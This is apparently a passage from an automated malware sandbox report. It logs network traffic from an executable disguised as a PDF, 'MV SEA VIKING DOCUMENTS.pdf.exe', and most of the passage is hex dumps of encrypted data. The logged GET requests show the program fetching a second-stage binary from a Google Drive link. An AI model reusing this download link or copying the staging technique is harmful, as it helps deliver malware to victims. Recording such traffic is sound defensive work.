                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC147INData Raw: 86 d9 2a 71 8c 1c da c3 31 af 0d 05 99 ad ae 87 72 14 25 8b 98 d3 7f 2d dc 1a f6 76 79 a0 d3 04 83 17 39 77 0f f3 10 97 61 c8 bd ac 72 c8 8c f1 69 44 e0 0c 90 6e 07 05 dd 2b eb 11 62 43 e3 ff fa 5c 9d cb cb f1 e1 59 92 51 76 9f 4c 93 f1 17 4c cb 37 5d 40 d6 28 9c 2f 87 69 8d 5e 60 fe 8c 29 a1 45 16 3a dd 6f 7b 4b 59 0d 4d 84 5b 0c 74 b3 0e 02 7d 2b 7b 8b 39 9d c5 11 71 bc ec 90 4f b9 81 8f 14 0a 41 76 e9 f4 12 b1 a8 a0 c7 80 4c 36 61 ce ae 30 34 69 7c 68 d3 ca fc 81 36 66 4c c1 9e 30 15 a6 3e 60 8b 7b e3 78 da 78 ca dd a9 6e 51 c0 df ea 90 07 ed c1 b2 89 af ba 04 ab 45 f7 e1 7f 21 47 67 bc a7 c6 2f f8 23 f1 a8 0b 13 cd 58 f1 aa c5 15 df c0 1a aa 14 10 ad 4b b4 95 da 2a 87 95 3e e9 e0 a9 9f 49 8e b1 8a 00 4a a6 ff e6 0e 01 05 f3 d9 07 3d 4b 35 97 dc b0 f0
                                                                                                                                                                                                                              Data Ascii: *q1r%-vy9wariDn+bC\YQvLL7]@(/i^`)E:o{KYM[t}+{9qOAvL6a04i|h6fL0>`{xxnQE!Gg/#XK*>IJ=K5
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC148INData Raw: 05 c3 59 a3 08 ca ea e3 3b 20 58 35 e4 ae 00 1b ba ff 3a 9b cc 3d 28 50 66 a3 78 6d 34 d1 68 29 d7 52 7c 19 28 a5 fc 49 31 52 bc fb 0b a1 7e 42 22 77 7a 80 5b da ee 7c b4 86 40 05 37 64 92 aa 11 12 62 6f fc 70 32 5c 45 fb 31 fb c8 c5 90 b2 58 70 b2 bb 1b ae 91 08 99 77 6c a1 a3 18 d5 79 3d 1e 6a 6b 4f d7 9d 52 37 09 2f ac fd f5 2b d5 8b 81 71 9c 92 e7 d3 f4 ec 40 17 3f d8 0b 5c 7a 6b 68 b6 d3 fa e8 fd d3 8d 5a 47 3a d1 f7 a9 b2 45 02 e4 9b e3 76 80 f9 aa 5b 19 f3 98 1b 01 18 c4 3d fb b6 37 2c db 29 f3 6b 17 1a f6 3b 97 38 0e bc 2b df 1c 63 33 37 33 c0 2d f0 ec 43 c6 fb 6d ae e3 b8 2b 92 05 55 2f ce 13 a7 41 7b 7f 27 05 46 de 27 c4 63 20 eb c6 b7 13 4d 5d ca eb 7b 86 b1 f1 c2 63 43 99 f4 f2 78 ab c9 85 10 c5 8c e4 5d 31 d1 34 78 e6 69 10 f2 51 a6 e8 3c 56
                                                                                                                                                                                                                              Data Ascii: Y; X5:=(Pfxm4h)R|(I1R~B"wz[|@7dbop2\E1Xpwly=jkOR7/+q@?\zkhZG:Ev[=7,)k;8+c373-Cm+U/A{'F'c M]{cCx]14xiQ<V
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC149INData Raw: d6 b3 17 e5 ec f1 c4 bc 1a df 6f 89 d1 c7 3b c0 12 d8 61 49 31 57 dd 76 a8 fc 2a cb 99 5b a0 4d e5 54 8a c3 4b 7e 87 ee b5 68 72 8f b1 df cc c8 6b fe 4b 1d 53 8a 61 f9 33 2f d3 69 4d 72 00 cd 4d d4 42 46 d5 03 6b 8c 8b fd 7b 36 a2 27 4e 9c af 5b 0b dc d3 bb 46 b1 e5 b4 99 01 e1 91 7d 26 9a 74 5c 08 c8 34 78 ff eb 6e a4 5f 35 5e 83 09 7d f1 a0 be 37 e3 60 1d bd 8c 12 11 6e 05 cd 40 fa cd fa d4 62 15 7b 72 79 9f 91 0c 71 d5 a9 1a 35 a3 69 85 9d b5 b3 5a 07 d4 78 8f d9 79 8d 52 49 da 24 9a 1a e6 b4 5b 53 c7 3d a3 7f e4 15 2d 67 3b d1 62 da 44 fa c1 89 a0 ab 51 0a 1c f4 35 ed 42 29 b5 be f9 5d 1a eb f1 8d 43 08 17 39 df 8b d9 56 42 35 2e 43 e1 9d 0a 23 4f ce a1 f9 e8 d2 7a 08 e5 23 87 2b 95 f9 eb a4 6e a0 f2 0a 0b 1d 11 e3 11 94 a0 57 9b d5 19 d7 a1 82 66 b8
                                                                                                                                                                                                                              Data Ascii: o;aI1Wv*[MTK~hrkKSa3/iMrMBFk{6'N[F}&t\4xn_5^}7`n@b{ryq5iZxyRI$[S=-g;bDQ5B)]C9VB5.C#Oz#+nWf
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC151INData Raw: c8 3e c1 13 62 8a 77 c6 42 4f 8b 76 8e 27 b9 c2 c6 53 9d 70 db 7e f6 fd fb 5e 5c ec e2 28 09 9b d9 cd 5b 2b 35 0b 34 17 dd 60 1a b6 f1 87 8c a7 d1 e5 49 33 b5 3a 2a bd 38 0d b5 8c af 63 0b b5 61 71 fd 13 74 c3 18 85 db 51 0b 1d 69 10 8a 26 d0 f4 f7 4d dd 0c 6a f3 17 11 73 7a fd 74 86 8c 62 69 65 5e 1f 07 21 25 ad 5f b7 8b ba af 4f a1 cf b9 2d 03 1d 15 91 14 48 54 aa 74 52 b4 7c 37 90 ea e4 bf 24 81 bd 0f d5 04 73 ea 48 e6 11 11 2e d3 37 0d c2 07 87 6c 6b 83 d6 30 89 7c 20 24 3a 48 af ed e8 74 87 3e 52 d5 ae c1 88 db f3 01 08 17 dd 6f 24 45 1e 05 ca ae 8e a9 0c 98 28 77 6d ea c9 28 85 06 19 39 a2 b5 cd 76 e6 b2 bb 98 66 7a 98 e6 54 f4 8e f9 67 07 23 c6 d9 db 15 14 a5 9b 8d 61 9d eb 48 e7 51 92 87 13 90 ca 9b bb 50 57 e4 f6 f2 97 7f 43 61 5c fe fd 80 8c 80
                                                                                                                                                                                                                              Data Ascii: >bwBOv'Sp~^\([+54`I3:*8caqtQi&Mjsztbie^!%_O-HTtR|7$sH.7lk0| $:Ht>Ro$E(wm(9vfzTg#aHQPWCa\
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC152INData Raw: 95 23 00 74 8f 9c 74 7a fa 1b 07 26 26 23 85 55 90 a4 5a 8b 60 a4 3e 5a 47 d1 80 d2 77 62 5e 4b 21 d0 ec 28 ed 2c 30 30 04 61 c1 d3 cf 2b b8 28 30 80 a7 1c 60 d9 0d ef 81 4a 6e be ab 47 05 f6 0e 99 f2 fb b4 8e 32 0d 9d ac 2d 5c fc f3 df 29 e5 ad fa a4 9b 47 9b ca 54 57 80 2f 3a 1e 3e 03 ba 00 d2 fa f3 a1 99 6a fd 44 93 87 47 de a0 3d c9 6f 1a c8 a9 7b 37 56 bd c5 07 cb 0c 89 78 b2 33 91 6a 99 b1 0f 69 4b fd 1a 66 8f 40 11 ae 5d f7 fa 2a 64 89 3b af f1 99 f7 8d 57 f0 b0 5f ff 08 9c 3d 77 c4 1e 3a bf 49 5c 56 90 35 7b 80 e5 4b 72 77 29 f6 43 a2 2a 34 91 89 84 09 73 89 f1 00 cc 83 53 9a b0 c0 81 3c 61 c5 09 7c 9b 84 2e a6 12 68 8b 0f 9b 2c f4 7c 2e 18 4a b8 d8 0d a4 43 53 14 a8 4e 37 d4 01 e3 e2 b3 28 78 04 c6 7d 08 e3 e1 82 f6 a4 33 6c b9 9b 0a 13 ac 2c db
                                                                                                                                                                                                                              Data Ascii: #ttz&&#UZ`>ZGwb^K!(,00a+(0`JnG2-\)GTW/:>jDG=o{7Vx3jiKf@]*d;W_=w:I\V5{Krw)C*4sS<a|.h,|.JCSN7(x}3l,
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC153INData Raw: 89 ab d9 4d 4b f1 22 d4 11 57 34 ba 38 6a 14 88 40 0a d4 4c 6c e9 68 43 f5 d4 01 ee 33 c7 ec 0d 26 bb 74 3a cd b6 be 29 80 2b 74 7e 41 12 38 eb 51 85 b4 ed e5 52 78 9d 61 40 82 29 b0 21 4d c7 2c 02 88 94 4d 62 9f 56 7f 6f 25 65 f4 b2 44 14 a8 4f 44 1b d8 7d 9a 80 0d 2f 9b b5 d1 3c 7a 42 81 ea d8 7c d4 92 b9 b1 7e 1d 57 4d 47 e7 52 68 04 1c cc 73 1f e0 17 f2 6a a7 b6 d6 37 31 e1 fb e3 38 90 41 7e a0 c1 d1 07 ea 4d 68 b9 de c5 df 48 be 0a 30 68 dc ca 8f 7d 9b a7 84 c2 76 a2 ad 43 27 50 05 2f 00 08 a5 b8 16 c3 30 91 ff b8 4c 7a c1 37 70 fe 34 50 67 21 ef 84 47 7b 35 46 4b 6c 7e a1 e5 46 90 aa b5 2d 70 a8 42 41 cb 9b 9a b8 84 86 ef 34 da 7d 38 8e 5d b1 b3 b4 98 7c 47 99 bb 60 71 70 41 c2 46 82 91 d6 7b f2 84 34 c4 f6 b6 b9 10 10 44 78 cd 3d 60 0a a5 06 a5 5e
                                                                                                                                                                                                                              Data Ascii: MK"W48j@LlhC3&t:)+t~A8QRxa@)!M,MbVo%eDOD}/<zB|~WMGRhsj718A~MhH0h}vC'P/0Lz7p4Pg!G{5FKl~F-pBA4}8]|G`qpAF{4Dx=`^
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC155INData Raw: ee 31 3b 7f 79 b9 43 f1 6c 37 83 9e 7b d4 5a ac 19 aa b9 f8 c7 1c d2 05 57 b4 4a 78 a3 2e 24 c6 46 86 4b 09 46 2e 88 00 38 43 7f b0 0e 9a b3 9c b4 f6 79 fa fe 60 4d 13 af 45 e0 1c 9d 2c 5c 1f 77 be db d7 28 d4 43 70 80 2a 4e 01 21 35 5d 89 3f e3 a8 ea be 0d ba 71 28 5b 3f b4 72 5c e7 46 04 6c 58 c7 d6 9a dc 91 ea c3 22 52 35 bf 77 8c 63 ad 92 4b 73 c9 f1 5b c5 07 42 8d bd 3a 45 8a bd 85 c5 16 4e 08 9f 95 2f db be cd f7 df e5 ea 44 8a ad 90 d9 9e 35 b7 0e dc 67 f0 eb 48 9e eb b2 4a 88 d5 f0 98 28 f6 40 64 10 99 37 fa b5 93 f5 71 89 1e 47 ff 1e 37 93 3c 54 22 e9 7c af e0 c2 71 ad 6f 53 7c f8 f9 5d 87 dc 8a 7f 57 63 4e cb a0 fd d7 91 31 d7 e3 b9 b3 b2 4c 85 9a 3c f2 c9 cb 67 a3 ac de fc cb 72 39 e3 79 ba 64 39 d3 74 84 18 c4 a0 aa 55 c2 7b ce b1 6c dd 0a 55
                                                                                                                                                                                                                              Data Ascii: 1;yCl7{ZWJx.$FKF.8Cy`ME,\w(Cp*N!5]?q([?r\FlX"R5wcKs[B:EN/D5gHJ(@d7qG7<T"|qoS|]WcN1L<gr9yd9tU{lU
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC156INData Raw: c6 35 a5 ab 44 6a d1 18 88 f5 98 7d ac 6e d9 4f 9a a9 dd f0 88 76 0b b3 56 5f 83 94 ae fd af 11 e0 52 78 dd d2 3b 94 21 b3 06 9f 7b 80 ab dc be 97 01 88 e3 07 a8 94 87 91 93 86 0b a5 75 de d7 54 53 08 d8 a0 e0 ea f6 f0 43 14 54 95 7b 02 17 dd ae f4 04 82 ec a7 4c 06 9b 26 18 21 5c 8e eb 7b 7b 4d 21 33 04 02 b9 74 0a 81 d1 d1 9c 6f fb 9f 32 08 cf 89 a4 c2 12 9d 62 ce bd 14 28 52 44 ae 40 d2 54 d5 88 6d 72 1c a0 a5 40 81 f7 d8 2d fb 43 bd 3b 10 dd 20 01 a0 fc 42 b1 ce aa 2e 06 95 97 b8 00 65 ab 2d 31 26 ef d9 d6 15 35 8e 7c c9 06 91 01 70 c5 a9 ae 8d 44 2d c7 37 4a 72 fc 93 2c 2f aa 1b 4d 47 e2 6d 1b 4e a4 05 18 6f d6 af e7 1c 08 3d 4f a5 a2 b9 b0 05 e2 39 d6 c1 88 2d 3a 29 fd 80 7d c6 e6 b4 19 c7 5b c8 90 bc 31 fc 5c 86 53 b5 53 1f c0 3f c2 a3 84 92 1c 01
                                                                                                                                                                                                                              Data Ascii: 5Dj}nOvV_Rx;!{uTSCT{L&!\{{M!3to2b(RD@Tmr@-C; B.e-1&5|pD-7Jr,/MGmNo=O9-:)}[1\SS?
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC157INData Raw: 26 2e 25 21 9b dd 97 67 84 ec 0c 12 96 fa 33 79 e1 31 96 a4 d4 b3 6f b5 c4 c5 0b ef ae da 08 13 98 4a e5 84 83 03 1c 0b e3 04 8c 56 b6 e6 83 0a c5 1e 8c 91 13 dd 05 e6 93 4a 65 20 9c 42 34 3d f7 61 78 b6 de ab 0a 1d 83 ed 39 ce 1a 09 85 24 76 88 d1 56 d5 78 84 c1 96 85 18 e0 25 08 70 8f 6c ed 61 f5 e6 68 a8 c0 1e 60 fa d4 c8 78 ab 82 b3 dc 88 42 ad bf d7 19 25 a9 9a f0 45 cd 36 cc d1 ac 93 ee cd 33 c7 15 1b 59 df b8 ca 02 13 3a 03 57 f7 d2 49 69 da d0 39 ab b0 a7 a9 f4 cf a2 56 83 46 dc 52 a1 c9 82 a5 1d 88 74 d8 fa 76 38 05 50 ca 4e d4 25 f4 a6 81 63 ca 24 e9 14 14 bb 5c ea 50 f9 1a 35 2d a2 e6 be d4 9e 07 fb 1e 39 02 14 e0 29 6b 98 d3 82 2c e5 91 40 f6 18 b1 4b 4f a9 7c f0 ea ee 43 06 07 4f 5e 3d b5 f5 6d 2d 82 67 77 ec 9f 90 66 1e 44 cb d8 48 42 aa 3e
                                                                                                                                                                                                                              Data Ascii: &.%!g3y1oJVJe B4=ax9$vVx%plah`xB%E63Y:WIi9VFRtv8PN%c$\P5-9)k,@KO|CO^=m-gwfDHB>
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC158INData Raw: 25 ac 65 37 cd 61 26 a8 5c fa 3b eb 1f 2f 94 52 9b 23 11 90 94 c5 59 d2 4c 4d ea e8 77 76 56 27 07 2f 90 d0 04 4d b9 12 b3 a2 f2 fe 83 d0 86 4a 34 42 70 45 c1 52 e0 30 d4 19 06 ef ef 3b 21 36 ec 98 0d 63 4d dd 5a e7 01 a7 40 df 86 d6 5c 46 78 8a 87 97 e1 36 c9 5c 64 65 f3 b7 9a 00 ab 7b 55 51 88 47 1b c7 59 d9 f3 01 ab ac 35 1e a9 4c 71 38 04 39 d6 d8 8a 21 3a 15 a8 6a ed 24 ea 8d 15 b1 a4 63 07 a9 c6 8e 9c ec bc 87 3b 7b b7 90 3f f7 7e cf 64 5f 31 85 41 eb 8f 9d 0f a8 1b d1 35 f7 a8 44 24 9e 97 15 39 99 6f 2f 2b 60 96 97 f9 01 bf 5c 91 8e 26 40 87 67 af 51 14 f4 9b 28 59 7f e3 b0 82 a5 45 41 1b cb 85 17 61 62 44 91 2b 8a 9b f2 3b a5 ca 89 c1 d1 39 4e 70 c4 dd 97 ed b0 c2 8e db 0c 2f a8 42 25 5e c3 d6 57 1f c7 45 ab 16 a8 4a fb 83 bd 42 7c a5 d5 47 36 ad
                                                                                                                                                                                                                              Data Ascii: %e7a&\;/R#YLMwvV'/MJ4BpER0;!6cMZ@\Fx6\de{UQGY5Lq89!:j$c;{?~d_1A5D$9o/+`\&@gQ(YEAabD+;9Np/B%^WEJB|G6
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC160INData Raw: fd 34 0c dc 6c 0a c1 0c 0c 82 62 b2 c1 7c 35 0f 07 f7 86 53 95 ad 41 ce f2 c9 6d c1 84 74 68 23 f4 fd 85 82 ce 6b 0e 47 06 ca db 82 5b dd 55 0b 81 2e 4a a0 41 7a 1a 99 ca ee 0e 70 4a d0 67 1e 0c b9 4f c6 d7 ab 90 86 ab 28 db c3 9a 08 26 06 51 a2 d7 56 80 20 b5 94 cd 93 ec da 15 30 8b fa 6e 70 a8 11 92 10 a1 26 a7 f4 e7 05 7a 36 65 6b d4 62 8c 6c 35 6f e3 9e 24 62 84 36 75 a5 6b 69 21 23 72 2a 41 e8 ab 60 9c f3 dc b5 af be 71 32 91 79 a3 6c 1f 95 9a cb e0 39 1b 3f a3 51 c3 73 8a 73 ed f7 7a 55 89 90 12 d3 b3 fe 59 77 5e 1c 50 d7 1b d9 b8 38 67 52 13 27 a3 38 ce 70 e4 20 e4 cc 7d cc 0c ea ca 08 45 f8 ed a3 5e c5 fb 87 c6 b7 5a 44 68 8b e8 cf ff cf 8b d4 a5 d0 25 8f 6c e1 b5 51 ac c5 1f 62 ed 77 b3 65 1e ed e8 d1 44 85 86 53 4f dd b0 a3 7c 4f ee d2 bd dc ab
                                                                                                                                                                                                                              Data Ascii: 4lb|5SAmth#kG[U.JAzpJgO(&QV 0np&z6ekbl5o$b6uki!#r*A`q2yl9?QsszUYw^P8gR'8p }E^ZDh%lQbweDSO|O


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.11.20 | 49807 | 142.250.185.174 | 443 | C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
Timestamp | kBytes transferred | Direction | Data
2022-02-21 15:54:14 UTC | 168 | OUT | GET /uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Host: drive.google.com
                                                                                                                                                                                                                              Cache-Control: no-cache
2022-02-21 15:54:14 UTC | 169 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:14 GMT
                                                                                                                                                                                                                              Location: https://doc-04-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvob9bt0aenrms2uk1g1u44qsq7kk1jh/1645458825000/01502421811266965908/*/1_L7ZipgVNc4_sHw57wljySn0gUbSqwED?e=download
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                              Content-Security-Policy: script-src 'nonce-FUszQsCpGi0VHz0AeHNv5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                              Server: ESF
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.11.20 | 49808 | 142.250.185.161 | 443 | C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
Timestamp | kBytes transferred | Direction | Data
2022-02-21 15:54:14 UTC | 170 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvob9bt0aenrms2uk1g1u44qsq7kk1jh/1645458825000/01502421811266965908/*/1_L7ZipgVNc4_sHw57wljySn0gUbSqwED?e=download HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Host: doc-04-08-docs.googleusercontent.com
                                                                                                                                                                                                                              Connection: Keep-Alive
2022-02-21 15:54:15 UTC | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                              X-GUploader-UploadID: ADPycduQ0XSmW9m21Ys9pwMV0lXMW5TedmBhT9hk4nNxKmK4Um1mHjTDQE6mfd3nTbshi-TfMekvfVz0mUIC7ymUnWk
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, 
X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                              Content-Disposition: attachment;filename="bin_uujKagG139.bin";filename*=UTF-8''bin_uujKagG139.bin
                                                                                                                                                                                                                              Content-Length: 167488
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:15 GMT
                                                                                                                                                                                                                              Expires: Mon, 21 Feb 2022 15:54:15 GMT
                                                                                                                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                                                                                                                              X-Goog-Hash: crc32c=WR929g==
                                                                                                                                                                                                                              Server: UploadServer
                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Ascii: !HrkbmG2"mvzu=ODU,H!TMQ8?[%HN@ | xWSd(K@Wu?)'$&CSY$jh"+wRu-:k]?o[s<g1|0j^1;s/z\]w)hg.1H<K#U=N*cyV@<)^3
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC191INData Raw: 50 24 37 31 fa ec 18 e1 da 10 3a 27 df ed 8c 13 1a 39 0a 1a fc c0 10 83 39 7f 1a 0c c5 85 6c 6c e8 0d 17 46 5f b3 b6 8f c5 94 2e ff 18 e5 61 1b 4c ae e8 0e fd 54 22 e8 3d c5 52 e9 cc df 15 c0 df 05 0f 7b 5a bb 5b b9 53 0e e9 c2 46 7f fe 77 f6 57 96 e4 4f 7b d1 7d 2f 60 78 94 6e 8b d8 37 0b 2a c3 91 f4 e9 f2 2f 4e e8 92 84 c5 ea 62 4e 5a b3 b5 f5 a9 32 f2 db 03 6e 43 71 7d 97 8f 5b 42 af 44 bc 12 e6 ce 21 a4 e7 ca ba eb 63 41 ec 66 c4 0f d4 0a 35 3a 97 7e 84 fc 11 4f 8c e5 0b 97 de 81 84 75 b4 f9 4d e2 00 41 b9 8f 3c b7 17 74 b7 73 7e ef a8 33 3a 37 b8 18 e5 e0 83 bd 6f 86 d3 e7 08 c1 ba ce 27 d7 94 bf 1c 89 86 24 ad 7a 5b 49 1b bf 05 d9 62 4b 57 a7 f0 7d 99 eb 03 16 d4 c3 37 5b cb dd fa ca 54 82 35 7f 0f a6 93 76 15 4e 4e d1 53 f1 a1 99 0a ec 98 63 7b e5
                                                                                                                                                                                                                              Data Ascii: P$71:'99llF_.aLT"=R{Z[SFwWO{}/`xn7*/NbNZ2nCq}[BD!cAf5:~OuMA<ts~3:7o'$z[IbKW}7[T5vNNSc{
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC192INData Raw: 68 8b ed 23 cb be 1a 63 7b 47 c5 27 03 bd e0 79 a5 ed 69 e2 15 e5 36 5d a8 59 72 64 87 0d 61 c4 53 66 ca 3b b0 c8 21 2d 1f de 03 29 3e 62 7e 76 ef 83 63 e3 23 f2 2e 37 7d 3e 44 3f 86 0d d8 68 53 d7 c7 df f1 31 f1 f6 82 ce 15 82 9e a6 2f eb bc 05 2b 8b 5d 49 07 fa a5 5b 58 48 e7 af 87 f3 36 a3 8b dd 96 32 e5 5e ac 48 8e 7a d7 dc e8 e3 07 a2 0d 66 72 59 93 44 84 bb 26 3c ce bd 82 93 4f e2 a8 85 ed 23 47 91 a0 3f aa 67 eb 40 e8 26 a4 74 f3 19 48 4b 3b 31 34 13 19 ed e4 2b fd 80 f0 e9 9f f4 fc 65 83 36 dc 4e c5 0e 86 45 32 dc 1d 31 c7 f0 4b 21 87 d2 09 5e 06 04 14 31 78 d3 1e b7 c3 c0 88 83 61 05 72 84 55 68 72 db a3 82 83 d6 58 cf b6 d6 f7 7a b4 cf 28 2a 79 27 f4 94 67 7d c0 f3 5d 3c 9e df 39 dd 33 a4 72 a8 79 21 e2 00 38 6e ad 23 f5 be 24 4f e3 f7 6b 67 49
                                                                                                                                                                                                                              Data Ascii: h#c{G'yi6]YrdaSf;!-)>b~vc#.7}>D?hS1/+]I[XH62^HzfrYD&<O#G?g@&tHK;14+e6NE21K!^1xarUhrXz(*y'g}]<93ry!8n#$OkgI
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC194INData Raw: 64 55 84 90 e5 87 9b bc fa e6 ba 4e e1 ef 4c f9 85 af 38 7e d9 93 d4 8e 22 f2 d9 a2 1d 5d b9 26 62 f3 50 45 af a6 da dd c5 0c cc d3 6c 9e f6 b8 19 9c 2f 42 28 13 9b 47 cf f9 77 df 73 f7 be 75 33 4f a5 47 4b 38 88 3b b0 4b 70 24 23 7e f6 f8 fe b4 e3 1c 33 b2 23 b4 6c 6f 1f 81 8a de 46 42 26 34 3b 37 ef 37 4c 01 ac bd 09 46 97 66 d8 84 46 a8 27 b1 6a cd 88 ec 9c d5 57 85 97 d7 23 61 b6 0e 36 cd 86 a4 79 8c 33 f4 71 bd 74 5c c8 63 37 49 92 ca 38 d0 da ab a2 e5 3e fe 47 4f 4e 5c 9e 8f b6 93 93 3c 7e d2 07 60 c1 ee 3c cc 5a 69 8c d3 bd 0d 28 8c 77 c6 32 48 df 6f 44 9e 38 75 1f 53 46 e8 d8 a5 af 69 5c bc 48 1f bc 06 4f b0 ed e6 ee e3 04 89 49 25 be be 12 49 99 ea ea 1c 9b 34 26 6a 56 48 50 8b 5b a0 7e 68 26 2d 81 00 cc 2b bb 05 b1 a2 f6 de bd 84 e6 05 de a0 ed
                                                                                                                                                                                                                              Data Ascii: dUNL8~"]&bPEl/B(Gwsu3OGK8;Kp$#~3#loFB&4;77LFfF'jW#a6y3qt\c7I8>GON\<~`<Zi(w2HoD8uSFi\HOI%I4&jVHP[~h&-+
